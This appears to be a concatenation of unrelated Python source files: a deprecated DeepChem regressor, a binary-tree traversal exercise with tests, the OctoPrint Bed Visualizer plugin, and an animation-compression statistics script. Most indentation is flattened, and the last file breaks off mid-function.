weight_init_stddevs: list
List of standard deviations for weights (sampled from zero-mean
gaussians). One for each layer.
bias_init_consts: list
List of bias initializations. One for each layer.
penalty: float
Amount of penalty (l2 or l1 applied)
penalty_type: str
Either "l2" or "l1"
dropouts: list
List of dropout amounts. One for each layer.
learning_rate: float
Learning rate for model.
momentum: float
Momentum. Only applied if optimizer=="momentum"
optimizer: str
Type of optimizer applied.
batch_size: int
Size of minibatches for training.
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
      Number of evaluations per example at predict time
    verbose: bool
Perform logging.
seed: int
If not none, is used as random seed for tensorflow.
"""
warnings.warn("TensorflowMultiTaskFitTransformRegressor "
"is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
TensorflowGraphModel.__init__(
self,
n_tasks,
n_features,
logdir=logdir,
layer_sizes=layer_sizes,
weight_init_stddevs=weight_init_stddevs,
bias_init_consts=bias_init_consts,
penalty=penalty,
penalty_type=penalty_type,
dropouts=dropouts,
learning_rate=learning_rate,
momentum=momentum,
optimizer=optimizer,
batch_size=batch_size,
pad_batches=False,
verbose=verbose,
seed=seed,
**kwargs)
def fit(self,
dataset,
nb_epoch=10,
max_checkpoints_to_keep=5,
log_every_N_batches=50,
checkpoint_interval=10,
**kwargs):
"""Perform fit transformations on each minibatch. Fit the model.
Parameters
----------
dataset: dc.data.Dataset
Dataset object holding training data
    nb_epoch: int
Number of training epochs.
max_checkpoints_to_keep: int
Maximum number of checkpoints to keep; older checkpoints will be deleted.
log_every_N_batches: int
Report every N batches. Useful for training on very large datasets,
where epochs can take long time to finish.
checkpoint_interval: int
Frequency at which to write checkpoints, measured in epochs
Raises
------
AssertionError
If model is not in training mode.
"""
############################################################## TIMING
time1 = time.time()
############################################################## TIMING
log("Training for %d epochs" % nb_epoch, self.verbose)
with self.train_graph.graph.as_default():
train_op = self.get_training_op(self.train_graph.graph,
self.train_graph.loss)
with self._get_shared_session(train=True) as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=max_checkpoints_to_keep)
# Save an initial checkpoint.
saver.save(sess, self._save_path, global_step=0)
# Define the code that runs on a separate thread to feed data into the queue.
def enqueue(sess, dataset, nb_epoch, epoch_end_indices):
index = 0
for epoch in range(nb_epoch):
for X_b, y_b, w_b, ids_b in dataset.iterbatches(
self.batch_size, pad_batches=self.pad_batches):
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict = self.construct_feed_dict(X_b, y_b, w_b, ids_b)
sess.run(self.train_graph.graph.enqueue, feed_dict=feed_dict)
index += 1
epoch_end_indices.append(index)
sess.run(self.train_graph.graph.queue.close())
epoch_end_indices = []
enqueue_thread = threading.Thread(
target=enqueue, args=[sess, dataset, nb_epoch, epoch_end_indices])
enqueue_thread.daemon = True
enqueue_thread.start()
# Main training loop.
try:
epoch = 0
index = 0
index_in_epoch = 0
avg_loss = 0.0
while True:
if index_in_epoch % log_every_N_batches == 0:
log("On batch %d" % index_in_epoch, self.verbose)
# Run training op.
fetches = self.train_graph.output + [
train_op, self.train_graph.loss
]
fetched_values = sess.run(fetches)
loss = fetched_values[-1]
avg_loss += loss
index += 1
index_in_epoch += 1
if len(epoch_end_indices) > 0 and index >= epoch_end_indices[0]:
# We have reached the end of an epoch.
if epoch % checkpoint_interval == checkpoint_interval - 1:
saver.save(sess, self._save_path, global_step=epoch)
avg_loss = float(avg_loss) / index_in_epoch
log('Ending epoch %d: Average loss %g' % (epoch, avg_loss),
self.verbose)
epoch += 1
index_in_epoch = 0
avg_loss = 0.0
del epoch_end_indices[0]
except tf.errors.OutOfRangeError:
# We have reached the end of the data.
pass
# Always save a final checkpoint when complete.
saver.save(sess, self._save_path, global_step=epoch + 1)
############################################################## TIMING
time2 = time.time()
print("TIMING: model fitting took %0.3f s" % (time2 - time1), self.verbose)
############################################################## TIMING
def predict_on_batch(self, X):
"""Return model output for the provided input. Each example is evaluated
self.n_evals times.
Restore(checkpoint) must have previously been called on this object.
Args:
      X: np.ndarray of input features for a single batch.
Returns:
Tuple of three numpy arrays with shape n_examples x n_tasks (x ...):
output: Model outputs.
labels: True labels.
weights: Example weights.
Note that the output and labels arrays may be more than 2D, e.g. for
classifier models that return class probabilities.
Raises:
AssertionError: If model is not in evaluation mode.
ValueError: If output and labels are not both 3D or both 2D.
"""
X_evals = []
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
X_evals.append(X_t)
len_unpadded = len(X_t)
if self.pad_batches:
for i in range(self.n_evals):
X_evals[i] = pad_features(self.batch_size, X_evals[i])
if not self._restored_model:
self.restore()
with self.eval_graph.graph.as_default():
# run eval data through the model
n_tasks = self.n_tasks
outputs = []
with self._get_shared_session(train=False).as_default():
n_samples = len(X_evals[0])
for i in range(self.n_evals):
output = []
feed_dict = self.construct_feed_dict(X_evals[i])
data = self._get_shared_session(train=False).run(
self.eval_graph.output, feed_dict=feed_dict)
batch_outputs = np.asarray(data[:n_tasks], dtype=float)
# reshape to batch_size x n_tasks x ...
if batch_outputs.ndim == 3:
batch_outputs = batch_outputs.transpose((1, 0, 2))
elif batch_outputs.ndim == 2:
batch_outputs = batch_outputs.transpose((1, 0))
# Handle edge case when batch-size is 1.
elif batch_outputs.ndim == 1:
n_samples = len(X)
batch_outputs = batch_outputs.reshape((n_samples, n_tasks))
else:
raise ValueError('Unrecognized rank combination for output: %s' %
(batch_outputs.shape))
# Prune away any padding that was added
batch_outputs = batch_outputs[:n_samples]
output.append(batch_outputs)
outputs.append(np.squeeze(np.concatenate(output)))
outputs = np.mean(np.array(outputs), axis=0)
outputs = np.copy(outputs)
# Handle case of 0-dimensional scalar output
if len(outputs.shape) > 0:
return outputs[:len_unpadded]
else:
outputs = np.reshape(outputs, (1,))
return outputs
|
solution.py
|
# python3
from abc import ABC
from collections import namedtuple
from sys import setrecursionlimit, stdin
from threading import stack_size, Thread
from typing import AnyStr, IO, List
from unittest import TestCase
setrecursionlimit(10 ** 6)
stack_size(2 ** 27)
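# Deep (unbalanced) trees would exceed CPython's default recursion and stack
# limits, so the limits are raised and main() runs on a Thread (see bottom of file).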
test = namedtuple('test', 'input expected')
class TreeOrders:
def __init__(self):
self.n = 0
self.key = self.left = self.right = None
def read(self, src: IO):
self.n = int(src.readline())
self.key = [0 for _ in range(self.n)]
self.left = [0 for _ in range(self.n)]
self.right = [0 for _ in range(self.n)]
for i in range(self.n):
[self.key[i], self.left[i], self.right[i]] = map(int, src.readline().split())
return self
def walk(self) -> List[List[int]]:
result, buf = [], [0 for _ in range(self.n)]
for walk in [self.in_order, self.pre_order, self.post_order]:
walk(buf)
result.append(buf[:])
return result
def in_order(self, buf: List[int], node: int = 0, position: int = 0) -> int:
if self.left[node] != -1:
position = self.in_order(buf, self.left[node], position)
buf[position] = self.key[node]
position += 1
if self.right[node] != -1:
position = self.in_order(buf, self.right[node], position)
return position
def pre_order(self, buf: List[int], node: int = 0, position: int = 0) -> int:
buf[position] = self.key[node]
position += 1
if self.left[node] != -1:
position = self.pre_order(buf, self.left[node], position)
if self.right[node] != -1:
position = self.pre_order(buf, self.right[node], position)
return position
def post_order(self, buf: List[int], node: int = 0, position: int = 0) -> int:
if self.left[node] != -1:
position = self.post_order(buf, self.left[node], position)
if self.right[node] != -1:
position = self.post_order(buf, self.right[node], position)
buf[position] = self.key[node]
position += 1
return position
class Fake(IO, ABC):
def __init__(self, rows: List[str]):
self.__i = -1
self.__rows = [str(len(rows))] + rows
def readline(self, limit: int = -1) -> AnyStr:
self.__i += 1
return self.__rows[self.__i]
class Test(TestCase):
def test_tree_orders(self):
tests = [
# samples
test([
'4 1 2',
'2 3 4',
'5 -1 -1',
'1 -1 -1',
'3 -1 -1',
], [
'1 2 3 4 5',
'4 2 1 3 5',
'1 3 2 5 4',
]),
test([
'0 7 2',
'10 -1 -1',
'20 -1 6',
'30 8 9',
'40 3 -1',
'50 -1 -1',
'60 1 -1',
'70 5 4',
'80 -1 -1',
'90 -1 -1',
], [
'50 70 80 30 90 40 0 20 10 60',
'0 70 50 40 30 80 90 20 60 10',
'50 80 90 30 40 70 10 60 20 0',
]),
]
for i, t in enumerate(tests):
src = Fake(t.input)
self.assertEqual(t.expected,
list(map(lambda way: ' '.join(str(step) for step in way), TreeOrders().read(src).walk())),
msg='at {} position'.format(i))
def main():
for way in TreeOrders().read(stdin).walk():
print(' '.join(str(step) for step in way))
if __name__ == '__main__':
Thread(target=main).start()
|
__init__.py
|
# coding=utf-8
from __future__ import absolute_import
import threading
import octoprint.plugin
from octoprint.events import Events
import re
import numpy as np
import logging
import flask
import json
class bedlevelvisualizer(
octoprint.plugin.StartupPlugin,
octoprint.plugin.TemplatePlugin,
octoprint.plugin.AssetPlugin,
octoprint.plugin.SettingsPlugin,
octoprint.plugin.WizardPlugin,
octoprint.plugin.SimpleApiPlugin,
octoprint.plugin.EventHandlerPlugin,
):
INTERVAL = 2.0
MAX_HISTORY = 10
def __init__(self):
self.processing = False
self.printing = False
self.mesh_collection_canceled = False
self.old_marlin = False
self.makergear = False
self.old_marlin_offset = 0
self.repetier_firmware = False
self.mesh = []
self.box = []
self.flip_x = False
self.flip_y = False
self.timeout_override = False
self._logger = logging.getLogger("octoprint.plugins.bedlevelvisualizer")
self._bedlevelvisualizer_logger = logging.getLogger(
"octoprint.plugins.bedlevelvisualizer.debug"
)
self.regex_mesh_data = re.compile(
r"^((G33.+)|(Bed.+)|(Llit.+)|(\d+\s)|(\|\s*)|(\s*\[\s+)|(\[?\s?\+?-?\d+?\.\d+\]?\s*,?)|(\s?\.\s*)|(NAN,"
r"?)|(nan\s?,?)|(=======\s?,?))+(\s+\],?)?$"
)
self.regex_bed_level_correction = re.compile(
r"^(Mesh )?Bed Level (Correction Matrix|data):.*$"
)
self.regex_nans = re.compile(r"^(nan\s?,?)+$")
self.regex_equal_signs = re.compile(r"^(=======\s?,?)+$")
self.regex_mesh_data_extraction = re.compile(r"(\+?-?\d*\.\d*)")
self.regex_old_marlin = re.compile(r"^(Bed x:.+)|(Llit x:.+)$")
self.regex_makergear = re.compile(
r"^(\s=\s\[)(\s*,?\s*\[(\s?-?\d+.\d+,?)+\])+\];?$"
)
self.regex_repetier = re.compile(r"^G33 X.+$")
self.regex_nan = re.compile(r"(nan)")
self.regex_catmull = re.compile(
r"^Subdivided with CATMULL ROM Leveling Grid:.*$"
)
self.regex_extracted_box = re.compile(r"\(\s*(\d+),\s*(\d+)\)")
self.regex_eqn_coefficients = re.compile(r"^Eqn coefficients:.+$")
self.regex_unknown_command = re.compile(
r"echo:Unknown command: \"@BEDLEVELVISUALIZER\""
)
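        # The regexes above classify firmware responses while mesh data is
        # being collected; process_gcode() below applies them line by line.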
# SettingsPlugin
def get_settings_defaults(self):
return dict(
command="",
stored_mesh=[],
stored_mesh_x=[],
stored_mesh_y=[],
stored_mesh_z_height=2,
save_mesh=True,
mesh_timestamp="",
flipX=False,
flipY=False,
stripFirst=False,
use_center_origin=False,
use_relative_offsets=False,
timeout=1800,
rotation=0,
ignore_correction_matrix=False,
screw_hub=0.5,
mesh_unit=1,
reverse=False,
showdegree=False,
imperial=False,
descending_y=False,
descending_x=False,
debug_logging=False,
commands=[],
show_labels=True,
show_webcam=False,
graph_z_limits="-2,2",
colorscale='[[0, "rebeccapurple"],[0.4, "rebeccapurple"],[0.45, "blue"],[0.5, "green"],[0.55, "yellow"],[0.6, "red"],[1, "red"]]',
save_snapshots=False,
)
def get_settings_version(self):
return 1
def on_settings_migrate(self, target, current=None):
if current is None or current < 1:
# Loop through commands adding new fields
commands_new = []
self._logger.info(self._settings.get(["commands"]))
for command in self._settings.get(["commands"]):
command["confirmation"] = False
command["input"] = []
command["message"] = ""
commands_new.append(command)
self._settings.set(["commands"], commands_new)
def on_settings_save(self, data):
old_debug_logging = self._settings.get_boolean(["debug_logging"])
octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
new_debug_logging = self._settings.get_boolean(["debug_logging"])
if old_debug_logging != new_debug_logging:
if new_debug_logging:
self._bedlevelvisualizer_logger.setLevel(logging.DEBUG)
else:
self._bedlevelvisualizer_logger.setLevel(logging.INFO)
# StartupPlugin
def on_startup(self, host, port):
# setup customized logger
from octoprint.logging.handlers import CleaningTimedRotatingFileHandler
bedlevelvisualizer_logging_handler = CleaningTimedRotatingFileHandler(
self._settings.get_plugin_logfile_path(postfix="debug"),
when="D",
backupCount=3,
)
bedlevelvisualizer_logging_handler.setFormatter(
logging.Formatter("[%(asctime)s] %(levelname)s: %(message)s")
)
bedlevelvisualizer_logging_handler.setLevel(logging.DEBUG)
self._bedlevelvisualizer_logger.addHandler(bedlevelvisualizer_logging_handler)
self._bedlevelvisualizer_logger.setLevel(
logging.DEBUG
if self._settings.get_boolean(["debug_logging"])
else logging.INFO
)
self._bedlevelvisualizer_logger.propagate = False
def on_after_startup(self):
self._logger.info("OctoPrint-BedLevelVisualizer loaded!")
# AssetPlugin
def get_assets(self):
return dict(
js=[
"js/jquery-ui.min.js",
"js/knockout-sortable.1.2.0.js",
"js/fontawesome-iconpicker.js",
"js/ko.iconpicker.js",
"js/plotly.min.js",
"js/bedlevelvisualizer.js",
],
css=[
"css/font-awesome.min.css",
"css/font-awesome-v4-shims.min.css",
"css/fontawesome-iconpicker.css",
"css/bedlevelvisualizer.css",
],
)
    # EventHandlerPlugin
def on_event(self, event, payload):
# Cancelled Print Interpreted Event
if event == Events.PRINT_FAILED and not self._printer.is_closed_or_error():
self.printing = False
# Print Started Event
if event == Events.PRINT_STARTED:
self.printing = True
# Print Done Event
if event == Events.PRINT_DONE:
self.printing = False
# atcommand hook
def enable_mesh_collection(self):
self.mesh = []
self.box = []
self._bedlevelvisualizer_logger.debug("mesh collection started")
self.processing = True
self._plugin_manager.send_plugin_message(
self._identifier, dict(processing=True)
)
def flag_mesh_collection(self, comm_instance, phase, command, parameters, tags=None, *args, **kwargs):
if command == "BEDLEVELVISUALIZER":
if parameters:
self._bedlevelvisualizer_logger.debug("Timeout override: {}".format(parameters))
self._plugin_manager.send_plugin_message(self._identifier, {"timeout_override": parameters})
thread = threading.Thread(target=self.enable_mesh_collection)
thread.daemon = True
thread.start()
return
def process_gcode(self, comm, line, *args, **kwargs):
if self.printing and line.strip() == "echo:BEDLEVELVISUALIZER":
thread = threading.Thread(target=self.enable_mesh_collection)
thread.daemon = True
thread.start()
return line
if not self.processing:
return line
if self._settings.get_boolean(
["ignore_correction_matrix"]
) and self.regex_bed_level_correction.match(line.strip()):
line = "ok"
if "ok" not in line:
if self.regex_mesh_data.match(line.strip()):
if self.regex_bed_level_correction.match(
line.strip()
) and not self._settings.get_boolean(["ignore_correction_matrix"]):
self._bedlevelvisualizer_logger.debug(
"resetting mesh to blank because of correction matrix"
)
self.mesh = []
return line
if self.regex_nans.match(line.strip()):
self._bedlevelvisualizer_logger.debug(
"stupid smoothieware issue..."
)
line = self.regex_nan.sub("0.0", line)
if self.regex_equal_signs.match(line.strip()):
self._bedlevelvisualizer_logger.debug("stupid equal signs...")
line = self.regex_equal_signs.sub("0.0", line)
new_line = self.regex_mesh_data_extraction.findall(line)
self._bedlevelvisualizer_logger.debug(new_line)
if self.regex_old_marlin.match(line.strip()):
self.old_marlin = True
self._bedlevelvisualizer_logger.debug("using old marlin flag")
if self.regex_repetier.match(line.strip()):
self.repetier_firmware = True
self._bedlevelvisualizer_logger.debug("using repetier flag")
if self._settings.get_boolean(["stripFirst"]):
new_line.pop(0)
if len(new_line) > 0:
self.mesh.append(new_line)
elif self.regex_catmull.match(line.strip()):
self._bedlevelvisualizer_logger.debug(
"resetting mesh to blank because of CATMULL subdivision"
)
self.mesh = []
elif self.regex_extracted_box.findall(line.strip()):
box = self.regex_extracted_box.findall(line.strip())
if len(box) == 2:
self.box += [[float(x), float(y)] for x, y in box]
if len(self.box) == 2:
if self.box[0][0] > self.box[1][0]:
self.flip_x = True
if len(self.box) == 4:
if self.box[0][1] > self.box[3][1]:
self.flip_y = True
if self.regex_makergear.match(line) is not None:
self._bedlevelvisualizer_logger.debug("using makergear format report")
self.mesh = json.loads(line.strip().replace("= ", "").replace(";", ""))
self.old_marlin = True
self.makergear = True
self._bedlevelvisualizer_logger.debug(self.mesh)
line = "ok"
if self.old_marlin and self.regex_eqn_coefficients.match(line.strip()):
self.old_marlin_offset = self.regex_eqn_coefficients.sub(
r"\2", line.strip()
)
self._bedlevelvisualizer_logger.debug("using old marlin offset")
if "Home XYZ first" in line or "Invalid mesh" in line:
reason = "data is invalid" if "Invalid" in line else "homing required"
self._bedlevelvisualizer_logger.debug(
"stopping mesh collection because %s" % reason
)
if "Home XYZ first" in line:
self._plugin_manager.send_plugin_message(
self._identifier, dict(error=line.strip())
)
self.processing = False
if ("ok" in line or (self.repetier_firmware and "T:" in line)) and len(
self.mesh
) > 0:
octoprint_printer_profile = self._printer_profile_manager.get_current()
volume = octoprint_printer_profile["volume"]
bed_type = volume["formFactor"]
custom_box = volume["custom_box"]
# see if we have a custom bounding box
if custom_box:
min_x = custom_box["x_min"]
max_x = custom_box["x_max"]
min_y = custom_box["y_min"]
max_y = custom_box["y_max"]
min_z = custom_box["z_min"]
max_z = custom_box["z_max"]
else:
min_x = 0
max_x = volume["width"]
min_y = 0
max_y = volume["depth"]
min_z = 0
max_z = volume["height"]
if len(self.box) == 4:
min_x = min([x for x, y in self.box])
max_x = max([x for x, y in self.box])
min_y = min([y for x, y in self.box])
max_y = max([y for x, y in self.box])
bed = dict(
type=bed_type,
x_min=min_x,
x_max=max_x,
y_min=min_y,
y_max=max_y,
z_min=min_z,
z_max=max_z,
)
self._bedlevelvisualizer_logger.debug(bed)
if self.old_marlin or self.repetier_firmware:
if not self.makergear:
a = np.swapaxes(self.mesh, 1, 0)
else:
a = np.array(self.mesh)
                x = np.unique(a[0]).astype(float)
                y = np.unique(a[1]).astype(float)
z = a[2].reshape((len(x), len(y)))
self._bedlevelvisualizer_logger.debug(a)
self._bedlevelvisualizer_logger.debug(x)
self._bedlevelvisualizer_logger.debug(y)
self._bedlevelvisualizer_logger.debug(z)
offset = 0
if self.old_marlin:
offset = self.old_marlin_offset
self._bedlevelvisualizer_logger.debug(offset)
self.mesh = np.subtract(
                        z, [offset], dtype=float, casting="unsafe"
).tolist()
self._bedlevelvisualizer_logger.debug(self.mesh)
self._bedlevelvisualizer_logger.debug("stopping mesh collection")
if bool(self.flip_x) != bool(self._settings.get(["flipX"])):
self._bedlevelvisualizer_logger.debug("flipping x axis")
self.mesh = np.flip(np.array(self.mesh), 1).tolist()
if bool(self.flip_y) != bool(self._settings.get(["flipY"])):
self._bedlevelvisualizer_logger.debug("flipping y axis")
self.mesh.reverse()
if self._settings.get_boolean(["use_relative_offsets"]):
self._bedlevelvisualizer_logger.debug("using relative offsets")
self.mesh = np.array(self.mesh)
if self._settings.get_boolean(["use_center_origin"]):
self._bedlevelvisualizer_logger.debug("using center origin")
self.mesh = np.subtract(
self.mesh,
self.mesh[len(self.mesh[0]) // 2, len(self.mesh) // 2],
                        dtype=float,
casting="unsafe",
).tolist()
else:
self.mesh = np.subtract(
                        self.mesh, self.mesh[0, 0], dtype=float, casting="unsafe"
).tolist()
            if self._settings.get_int(["rotation"]) > 0:
self._bedlevelvisualizer_logger.debug(
"rotating mesh by %s" % self._settings.get(["rotation"])
)
self.mesh = np.array(self.mesh)
self.mesh = np.rot90(
                    self.mesh, self._settings.get_int(["rotation"]) // 90
).tolist()
if bed_type == "circular":
n = len(self.mesh[0])
m = len(self.mesh)
circle_mask = self.create_circular_mask(m, n)
self.mesh = np.array(self.mesh)
self.mesh[~circle_mask] = None
self.mesh = self.mesh.tolist()
self._bedlevelvisualizer_logger.debug(self.mesh)
self.processing = False
self._bedlevelvisualizer_logger.debug(self.mesh)
self._plugin_manager.send_plugin_message(
self._identifier, dict(mesh=self.mesh, bed=bed)
)
self.send_mesh_data_collected_event(self.mesh, bed)
return line
def create_circular_mask(self, h, w, center=None, radius=None):
if center is None: # use the middle of the image
center = (int(w / 2), int(h / 2))
if (
radius is None
): # use the smallest distance between the center and image walls
radius = min(center[0], center[1], w - center[0], h - center[1])
Y, X = np.ogrid[:h, :w]
dist_from_center = np.sqrt((X - center[0]) ** 2 + (Y - center[1]) ** 2)
mask = dist_from_center <= radius
return mask
# SimpleApiPlugin
def get_api_commands(self):
return dict(stopProcessing=[])
def on_api_get(self, request):
if request.args.get("stopProcessing"):
self._bedlevelvisualizer_logger.debug(
"Canceling mesh collection per user request"
)
self._bedlevelvisualizer_logger.debug(
"Mesh data collected prior to cancel:"
)
self._bedlevelvisualizer_logger.debug(self.mesh)
self.processing = False
self.mesh_collection_canceled = True
self.mesh = []
self._bedlevelvisualizer_logger.debug("Mesh data after clearing:")
self._bedlevelvisualizer_logger.debug(self.mesh)
response = dict(stopped=True)
return flask.jsonify(response)
# Custom Event Hook
def send_mesh_data_collected_event(self, mesh_data, bed_data):
event = Events.PLUGIN_BEDLEVELVISUALIZER_MESH_DATA_COLLECTED
custom_payload = dict(mesh=mesh_data, bed=bed_data)
self._event_bus.fire(event, payload=custom_payload)
def register_custom_events(*args, **kwargs):
return ["mesh_data_collected"]
# Software Update Hook
def get_update_information(self):
return dict(
bedlevelvisualizer=dict(
displayName="Bed Visualizer",
displayVersion=self._plugin_version,
# version check: github repository
type="github_release",
user="jneilliii",
repo="OctoPrint-BedLevelVisualizer",
current=self._plugin_version,
stable_branch=dict(
name="Stable", branch="master", comittish=["master"]
),
prerelease_branches=[
dict(
name="Release Candidate",
branch="rc",
comittish=["rc", "master"],
)
],
# update method: pip
pip="https://github.com/jneilliii/OctoPrint-BedLevelVisualizer/archive/{target_version}.zip",
)
)
__plugin_name__ = "Bed Visualizer"
__plugin_pythoncompat__ = ">=2.7,<4"
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = bedlevelvisualizer()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.comm.protocol.atcommand.sending": __plugin_implementation__.flag_mesh_collection,
"octoprint.comm.protocol.gcode.received": __plugin_implementation__.process_gcode,
"octoprint.events.register_custom_events": __plugin_implementation__.register_custom_events,
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information,
}
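# --- Illustrative sketch (not part of the plugin) ----------------------------
# Shows what bedlevelvisualizer.create_circular_mask() does for a circular
# bed: on a 3x3 mesh the inscribed circle keeps the plus-shaped centre points
# and drops the corners, which process_gcode() then blanks out. Standalone
# helper for illustration only; it is never called by the plugin.
def _example_circular_mask_demo():
    import numpy as np
    mesh = np.ones((3, 3))
    h, w = mesh.shape
    center = (int(w / 2), int(h / 2))
    radius = min(center[0], center[1], w - center[0], h - center[1])
    Y, X = np.ogrid[:h, :w]
    mask = np.sqrt((X - center[0]) ** 2 + (Y - center[1]) ** 2) <= radius
    mesh[~mask] = np.nan  # the four corners lie outside the inscribed circle
    return mesh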
|
acl_compressor.py
|
import multiprocessing
import os
import platform
import queue
import threading
import time
import signal
import sys
# This script depends on a SJSON parsing package:
# https://pypi.python.org/pypi/SJSON/1.1.0
# https://shelter13.net/projects/SJSON/
# https://bitbucket.org/Anteru/sjson/src
import sjson
def parse_argv():
options = {}
options['acl'] = ""
options['stats'] = ""
options['csv_summary'] = False
options['csv_bit_rate'] = False
options['csv_animated_size'] = False
options['csv_error'] = False
options['refresh'] = False
options['num_threads'] = 1
for i in range(1, len(sys.argv)):
value = sys.argv[i]
# TODO: Strip trailing '/' or '\'
if value.startswith('-acl='):
options['acl'] = value[len('-acl='):].replace('"', '')
options['acl'] = os.path.expanduser(options['acl'])
if value.startswith('-stats='):
options['stats'] = value[len('-stats='):].replace('"', '')
options['stats'] = os.path.expanduser(options['stats'])
if value == '-csv_summary':
options['csv_summary'] = True
if value == '-csv_bit_rate':
options['csv_bit_rate'] = True
if value == '-csv_animated_size':
options['csv_animated_size'] = True
if value == '-csv_error':
options['csv_error'] = True
if value == '-refresh':
options['refresh'] = True
if value.startswith('-parallel='):
options['num_threads'] = int(value[len('-parallel='):].replace('"', ''))
    if not options['acl']:
        print('ACL input directory not specified')
print_usage()
sys.exit(1)
    if not options['stats']:
        print('Stat output directory not specified')
print_usage()
sys.exit(1)
if options['num_threads'] <= 0:
print('-parallel switch argument must be greater than 0')
print_usage()
sys.exit(1)
if not os.path.exists(options['acl']) or not os.path.isdir(options['acl']):
print('ACL input directory not found: {}'.format(options['acl']))
print_usage()
sys.exit(1)
if not os.path.exists(options['stats']):
os.makedirs(options['stats'])
if not os.path.isdir(options['stats']):
print('The output stat argument must be a directory')
print_usage()
sys.exit(1)
return options
def print_usage():
print('Usage: python acl_compressor.py -acl=<path to directory containing ACL files> -stats=<path to output directory for stats> [-csv_summary] [-csv_bit_rate] [-csv_animated_size] [-csv_error] [-refresh] [-parallel={Num Threads}]')
def print_stat(stat):
print('Algorithm: {}, Format: [{}], Ratio: {:.2f}, Error: {}'.format(stat['algorithm_name'], stat['desc'], stat['compression_ratio'], stat['max_error']))
print('')
def bytes_to_mb(size_in_bytes):
return size_in_bytes / (1024.0 * 1024.0)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
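# Worked example: format_elapsed_time(3725.5) computes divmod(3725.5, 3600)
# -> (1, 125.5) and divmod(125.5, 60) -> (2, 5.5), yielding '01h 02m 05.50s'.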
def sanitize_csv_entry(entry):
return entry.replace(', ', ' ').replace(',', '_')
def create_csv(options):
csv_data = {}
stat_dir = options['stats']
if options['csv_summary']:
stats_summary_csv_filename = os.path.join(stat_dir, 'stats_summary.csv')
stats_summary_csv_file = open(stats_summary_csv_filename, 'w')
csv_data['stats_summary_csv_file'] = stats_summary_csv_file
print('Generating CSV file {} ...'.format(stats_summary_csv_filename))
print('Algorithm Name, Raw Size, Compressed Size, Compression Ratio, Compression Time, Clip Duration, Num Animated Tracks, Max Error', file = stats_summary_csv_file)
if options['csv_bit_rate']:
stats_bit_rate_csv_filename = os.path.join(stat_dir, 'stats_bit_rate.csv')
stats_bit_rate_csv_file = open(stats_bit_rate_csv_filename, 'w')
csv_data['stats_bit_rate_csv_file'] = stats_bit_rate_csv_file
print('Generating CSV file {} ...'.format(stats_bit_rate_csv_filename))
print('Algorithm Name, 0, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 32', file = stats_bit_rate_csv_file)
if options['csv_animated_size']:
stats_animated_size_csv_filename = os.path.join(stat_dir, 'stats_animated_size.csv')
stats_animated_size_csv_file = open(stats_animated_size_csv_filename, 'w')
csv_data['stats_animated_size_csv_file'] = stats_animated_size_csv_file
print('Generating CSV file {} ...'.format(stats_animated_size_csv_filename))
print('Algorithm Name, Segment Index, Animated Size', file = stats_animated_size_csv_file)
if options['csv_error']:
stats_error_csv_filename = os.path.join(stat_dir, 'stats_error.csv')
stats_error_csv_file = open(stats_error_csv_filename, 'w')
csv_data['stats_error_csv_file'] = stats_error_csv_file
print('Generating CSV file {} ...'.format(stats_error_csv_filename))
print('Clip Name, Key Frame, Bone Index, Error', file = stats_error_csv_file)
return csv_data
def close_csv(csv_data):
if len(csv_data) == 0:
return
if 'stats_summary_csv_file' in csv_data:
csv_data['stats_summary_csv_file'].close()
if 'stats_bit_rate_csv_file' in csv_data:
csv_data['stats_bit_rate_csv_file'].close()
if 'stats_animated_size_csv_file' in csv_data:
csv_data['stats_animated_size_csv_file'].close()
if 'stats_error_csv_file' in csv_data:
csv_data['stats_error_csv_file'].close()
def append_csv(csv_data, job_data):
if 'stats_summary_csv_file' in csv_data:
data = job_data['stats_summary_data']
for (name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error) in data:
print('{}, {}, {}, {}, {}, {}, {}, {}'.format(name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error), file = csv_data['stats_summary_csv_file'])
if 'stats_animated_size_csv_file' in csv_data:
size_data = job_data['stats_animated_size']
for (name, segment_index, size) in size_data:
print('{}, {}, {}'.format(name, segment_index, size), file = csv_data['stats_animated_size_csv_file'])
if 'stats_error_csv_file' in csv_data:
error_data = job_data['stats_error_data']
for (name, segment_index, data) in error_data:
key_frame = 0
for frame_errors in data:
bone_index = 0
for bone_error in frame_errors:
print('{}, {}, {}, {}'.format(name, key_frame, bone_index, bone_error), file = csv_data['stats_error_csv_file'])
bone_index += 1
key_frame += 1
def write_csv(csv_data, agg_data):
if 'stats_bit_rate_csv_file' in csv_data:
for algorithm_uid, algo_data in agg_data.items():
total_count = float(sum(algo_data['bit_rates']))
print('{}, {}'.format(algo_data['csv_name'], ', '.join([str((float(x) / total_count) * 100.0) for x in algo_data['bit_rates']])), file = csv_data['stats_bit_rate_csv_file'])
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 50):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
